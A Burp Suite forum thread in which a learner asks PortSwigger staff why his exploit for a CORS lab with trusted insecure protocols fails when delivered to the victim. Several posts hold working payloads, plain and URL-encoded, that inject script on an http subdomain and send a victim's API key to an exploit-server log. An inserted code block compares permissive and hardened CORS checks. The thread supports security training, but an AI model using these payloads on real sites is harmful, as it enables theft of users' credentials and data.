The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: CORS vulnerability with trusted insecure protocols - exploit works in my browser (Chrome) but not when delivered to the victim

Lorenzo | Last updated: Jul 27, 2024 05:58PM UTC

Hi, I have a problem in the context of the lab "Lab: CORS vulnerability with trusted insecure protocols". The problem is as follows: I rolled my own payload to be delivered to the victim. The payload is:

<script> fetch('https://0a2000fd0316619e81a34ded0063007f.web-security-academy.net/accountDetails', { method: 'GET', credentials: 'include' }).then(response => response.json()).then(data => fetch('https://exploit-0a3c0094036561db811f4cf901b80068.exploit-server.net/log?key=' + data.apikey));</script>

I URL-encoded the above payload and then inserted it into the subdomain to redirect the victim as follows:

<script> document.location="https://stock.0a2000fd0316619e81a34ded0063007f.web-security-academy.net/?productId=4%3c%73%63%72%69%70%74%3e%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%30%61%32%30%30%30%66%64%30%33%31%36%36%31%39%65%38%31%61%33%34%64%65%64%30%30%36%33%30%30%37%66%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%61%63%63%6f%75%6e%74%44%65%74%61%69%6c%73%27%2c%20%7b%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%20%63%72%65%64%65%6e%74%69%61%6c%73%3a%20%27%69%6e%63%6c%75%64%65%27%7d%29%2e%74%68%65%6e%28%72%65%73%70%6f%6e%73%65%3d%3e%72%65%73%70%6f%6e%73%65%2e%6a%73%6f%6e%28%29%29%2e%74%68%65%6e%28%64%61%74%61%20%3d%3e%20%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%33%63%30%30%39%34%30%33%36%35%36%31%64%62%38%31%31%66%34%63%66%39%30%31%62%38%30%30%36%38%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%3f%6b%65%79%3d%27%2b%64%61%74%61%2e%61%70%69%6b%65%79%29%29%3b%3c%2f%73%63%72%69%70%74%3e&storeId=1" </script>

When I click on "View exploit" my payload seems to be working fine, because the exploit server log shows the request with the API key, as you can see in the image: https://ibb.co/2NjsZ2n

The problem is that when I deliver it to the victim, even though the exploit server log shows that the victim has accessed the /exploit directory, it does not show his API key.
What am I doing wrong? Thank you very much.
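The chain in this lab works because the application reflects any subdomain origin, including plain-http ones, with Access-Control-Allow-Credentials: true, so an XSS on the http stock subdomain can read the credentialed /accountDetails body. As an added example (not code from the lab, the thread or PortSwigger), here is the permissive origin check beside a hardened one; the hostnames are constructed placeholders.

```javascript
// Added example: CORS origin validation, permissive vs strict.
// Hostnames are constructed placeholders, not lab IDs.
const ALLOWED_ORIGINS = new Set([
  "https://stock.example-shop.test",
  "https://admin.example-shop.test",
]);

// Vulnerable pattern: any subdomain on any scheme is reflected with credentials,
// so a script injected on the http:// subdomain can read authenticated responses.
function corsHeadersPermissive(origin) {
  if (typeof origin !== "string") return {};
  const m = /^https?:\/\/([a-z0-9.-]+)\.example-shop\.test$/i.exec(origin);
  if (!m) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened: parse with the URL API, require https, match an exact allowlist,
// and always emit Vary: Origin so a shared cache never replays one origin's headers.
function corsHeadersStrict(origin) {
  const deny = { Vary: "Origin" };
  if (typeof origin !== "string") return deny;
  let u;
  try { u = new URL(origin); } catch { return deny; }        // "null", garbage, etc.
  if (u.protocol !== "https:") return deny;                  // no insecure protocols
  // u.origin normalises the value; requiring equality with the raw header rejects
  // trailing paths, userinfo tricks and anything else that is not a bare origin.
  if (u.origin !== origin || !ALLOWED_ORIGINS.has(u.origin)) return deny;
  return {
    "Access-Control-Allow-Origin": u.origin,
    "Access-Control-Allow-Credentials": "true",
    Vary: "Origin",
  };
}

// True if a browser at `origin` could read a credentialed body under these headers.
function allowsCredentialedRead(headers, origin) {
  return headers["Access-Control-Allow-Origin"] === origin &&
         headers["Access-Control-Allow-Credentials"] === "true";
}
```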

Ben, PortSwigger Agent | Last updated: Jul 28, 2024 03:40PM UTC

Hi, Which browser are you using when you attempt this lab?

Lorenzo | Last updated: Jul 29, 2024 09:16AM UTC

Hi, The browser that I'm using is google chrome.

Ben, PortSwigger Agent | Last updated: Jul 29, 2024 09:25AM UTC

Hi Lorenzo, Do you have issues using the official written solution as well?

Lorenzo | Last updated: Jul 29, 2024 10:01AM UTC

Hi, yes, the same behaviour happens with the official solution. The steps that I used are the same as for my own custom one. I took the official solution (with the right URL substitution):

<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a9600c0031f1d1a86e1d90d006200b1.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a86008f03a31d4f866ad86301e60015.exploit-server.net/log?key='+this.responseText; };</script>

Then I URL-encoded it and put it in the payload to be hosted on the exploit server:

<script> document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4%3c%73%63%72%69%70%74%3e%76%61%72%20%72%65%71%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%20%72%65%71%2e%6f%6e%6c%6f%61%64%20%3d%20%72%65%71%4c%69%73%74%65%6e%65%72%3b%20%72%65%71%2e%6f%70%65%6e%28%27%67%65%74%27%2c%27%68%74%74%70%73%3a%2f%2f%30%61%39%36%30%30%63%30%30%33%31%66%31%64%31%61%38%36%65%31%64%39%30%64%30%30%36%32%30%30%62%31%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%61%63%63%6f%75%6e%74%44%65%74%61%69%6c%73%27%2c%74%72%75%65%29%3b%20%72%65%71%2e%77%69%74%68%43%72%65%64%65%6e%74%69%61%6c%73%20%3d%20%74%72%75%65%3b%72%65%71%2e%73%65%6e%64%28%29%3b%66%75%6e%63%74%69%6f%6e%20%72%65%71%4c%69%73%74%65%6e%65%72%28%29%20%7b%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%38%36%30%30%38%66%30%33%61%33%31%64%34%66%38%36%36%61%64%38%36%33%30%31%65%36%30%30%31%35%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%3f%6b%65%79%3d%27%2b%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%3b%20%7d%3b%3c%2f%73%63%72%69%70%74%3e%0a&storeId=1" </script>

The result is that my accesses are logged, but when I send it to the victim it doesn't record his credentials, as can be seen in the following image: https://ibb.co/vk1GcWX Thank you very much for your support.

Michelle, PortSwigger Agent | Last updated: Jul 30, 2024 02:30PM UTC

Hi, thanks for sending the screenshot over. Can I confirm which version of Chrome you're using when you're working on this lab, please?

Lorenzo | Last updated: Jul 30, 2024 02:46PM UTC

Hi, the version is "Version 127.0.6533.72 (Official Build) (64-bit)". If you need more information, feel free to ask. Thank you very much for your patience.

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 12:51PM UTC

Hi, thanks for the update. We'll do some more checks and be in touch soon.

Michelle, PortSwigger Agent | Last updated: Aug 02, 2024 02:07PM UTC

Hi, thanks for your patience. Just to let you know we're still looking into this, but the issue seems to exist only when you test the exploit on yourself using 'View exploit'. If you deliver the exploit to the victim and check the access logs, you should see the victim in the exploit server logs.

Lorenzo | Last updated: Aug 03, 2024 09:07AM UTC

Hi, yes, I see the victim but without the information about the credentials, as if the payload won't run in the victim's browser (as you can see from the images in the posts above). Regards, Lorenzo.

Michelle, PortSwigger Agent | Last updated: Aug 05, 2024 12:15PM UTC

Hi, were you still logged into the lab with your own account at the stage where you delivered the exploit to the victim and checked the access logs?

Lorenzo | Last updated: Aug 06, 2024 08:15PM UTC

Yes, I was logged in with the account wiener:peter. Thanks.

Michelle, PortSwigger Agent | Last updated: Aug 07, 2024 09:19AM UTC

If you try delivering the attack to the victim again, does the same thing happen?

Lorenzo | Last updated: Aug 07, 2024 10:21AM UTC

Hi, I logged in with wiener:peter and used the same payload as described in my first post (the payload I rolled myself). The result is that when I click on "View exploit" and try it on myself I see the API key, but if I deliver it to the victim I still only see that the victim accessed the /exploit directory; it is as if my payload doesn't trigger. The following screenshot shows what I see in the access log: https://ibb.co/nqX3RvH. NOTE: in the screenshot above the highlighted row is the result of me clicking on "View exploit". I also tried the official solution to see if I could solve the lab with it, but it still doesn't work, as can be seen in the screenshot https://ibb.co/n3q7dMH. NOTE: the highlighted row is the result of me clicking on "View exploit". To give you a better understanding of the problem I'm available on Teams/Discord or whatever program you like to show you step by step how I approach the lab. Alternatively, I can upload a short video. Please let me know. This is the only lab that I need to solve to complete the Practitioner level. Regards.

Michelle, PortSwigger Agent | Last updated: Aug 07, 2024 12:17PM UTC

Hi, if you could email a screen recording to support@portswigger.net so I can compare everything to the steps we're taking here, that would be great :)

Lorenzo | Last updated: Aug 07, 2024 06:07PM UTC

Hi, I sent you an email. Thank you very much.

Dominyque, PortSwigger Agent | Last updated: Aug 08, 2024 06:43AM UTC